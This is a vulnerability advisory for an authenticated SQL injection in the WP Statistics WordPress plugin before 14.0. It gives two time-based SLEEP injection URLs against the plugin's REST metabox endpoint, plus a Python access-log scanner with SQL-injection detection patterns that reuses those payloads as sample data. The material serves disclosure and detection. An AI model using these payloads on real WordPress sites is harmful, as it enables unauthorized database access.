WordPress Plugin Vulnerabilities

WP Statistics < 14.0 - Authenticated SQLi

Description

The plugin does not escape a parameter, which could allow authenticated users to perform SQL Injection attacks. By default, the affected feature is available to users with the manage_options capability (admin+); however, the plugin has a setting that allows low-privilege users to access it as well.

Proof of Concept

Log in as a user allowed to view WP Statistics (by default admins, but this can be changed in Statistics > Settings > Roles), get a nonce via https://a.com/wp-admin/admin-ajax.php?action=rest-nonce, and use it in the URLs below, which will result in a 6s delay.

https://a.com/wp-json/wp-statistics/v2/metabox?_wpnonce=XXXX&name=pages-chart&ago=1&type=a%27%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(2)))Ab)--%20Cd
https://a.com/wp-json/wp-statistics/v2/metabox?_wpnonce=XXXX&name=pages-chart&ago=1&ID=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(2)))Ab)--%20Cd
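As an added, defender-side example that is not part of the advisory: a small Python scanner that runs over constructed web-server access-log lines and flags time-based SQL injection attempts against the plugin's wp-statistics REST endpoint. The two attack lines reuse the advisory's own PoC payloads; the log format itself, the trailing per-request response-time field (modelled on nginx's $request_time) and the IP addresses and timestamps are assumptions made for the example. The signature set is generic (quote, comment, SLEEP/BENCHMARK, boolean subselect), so it also catches variants of the PoC that target other parameters of the same endpoint.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not taken from the advisory or any real
# server).  Format assumed: combined log format plus a trailing request time in
# seconds.  Lines 1-2 carry the advisory's PoC payloads; lines 3-4 are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Mar/2023:10:00:01 +0000] "GET /wp-json/wp-statistics/v2/metabox?_wpnonce=XXXX&name=pages-chart&ago=1&type=a%27%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(2)))Ab)--%20Cd HTTP/1.1" 200 512 6.012
10.0.0.5 - - [06/Mar/2023:10:00:09 +0000] "GET /wp-json/wp-statistics/v2/metabox?_wpnonce=XXXX&name=pages-chart&ago=1&ID=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(2)))Ab)--%20Cd HTTP/1.1" 200 512 6.004
10.0.0.7 - - [06/Mar/2023:10:00:12 +0000] "GET /wp-json/wp-statistics/v2/metabox?_wpnonce=XXXX&name=pages-chart&ago=1&type=page&ID=17 HTTP/1.1" 200 1480 0.031
10.0.0.9 - - [06/Mar/2023:10:00:15 +0000] "GET /wp-admin/admin-ajax.php?action=rest-nonce HTTP/1.1" 200 10 0.005
"""

# One access-log line: client IP, timestamp, request line, status, bytes, seconds.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) (?P<rtime>[\d.]+)$'
)

# Signatures of a (time-based) SQL injection payload, each checked against the
# URL-decoded value of a query parameter.  Dict order is the report order.
SQLI_PATTERNS = {
    "quote-break": re.compile(r"['\"]"),
    "comment": re.compile(r"--\s|/\*"),
    "SLEEP(": re.compile(r"\bsleep\s*\(", re.I),
    "BENCHMARK(": re.compile(r"\bbenchmark\s*\(", re.I),
    "boolean-subselect": re.compile(r"\b(and|or)\b.*\bselect\b", re.I | re.S),
}


def parse_log_line(line):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["rtime"] = float(rec["rtime"])
    return rec


def suspicious_indicators(value):
    """List the SQLI_PATTERNS names that fire on a decoded parameter value."""
    return [name for name, rx in SQLI_PATTERNS.items() if rx.search(value)]


def scan_log(text, slow_seconds=2.0, path_prefix="/wp-json/wp-statistics/"):
    """Scan access-log text for injection attempts against the plugin endpoint.

    A request is reported when any query parameter carries an SQL signature;
    a response time at or above `slow_seconds` is added as a further indicator,
    since a time-based payload shows up as an abnormally slow request.
    """
    findings = []
    for line in text.splitlines():
        rec = parse_log_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        if not parts.path.startswith(path_prefix):
            continue
        # parse_qsl percent-decodes values, so %27 becomes a literal quote here.
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            hits = suspicious_indicators(value)
            if not hits:
                continue
            if rec["rtime"] >= slow_seconds:
                hits.append("slow-response")
            findings.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "path": parts.path,
                "param": param,
                "value": value,
                "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['path']} param={f['param']!r} "
              f"indicators={','.join(f['indicators'])}")
        print(f"    decoded value: {f['value']}")
```

The response-time indicator is what separates a blind, time-based probe from a noisy but harmless request: a parameter containing SLEEP( together with a multi-second response is a strong signal, whereas a single quote alone in a parameter is only worth a low-severity alert. On a real deployment the path prefix and the slow-request threshold would be tuned to the site's normal REST traffic.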

Affects Plugins

Fixed in 14.0

Classification

Type
SQLI

Miscellaneous

Original Researcher
Erwan LR (WPScan)
Verified
Yes

Timeline

Publicly Published
2023-03-06
Added
2023-03-06
Last Updated
2023-03-06
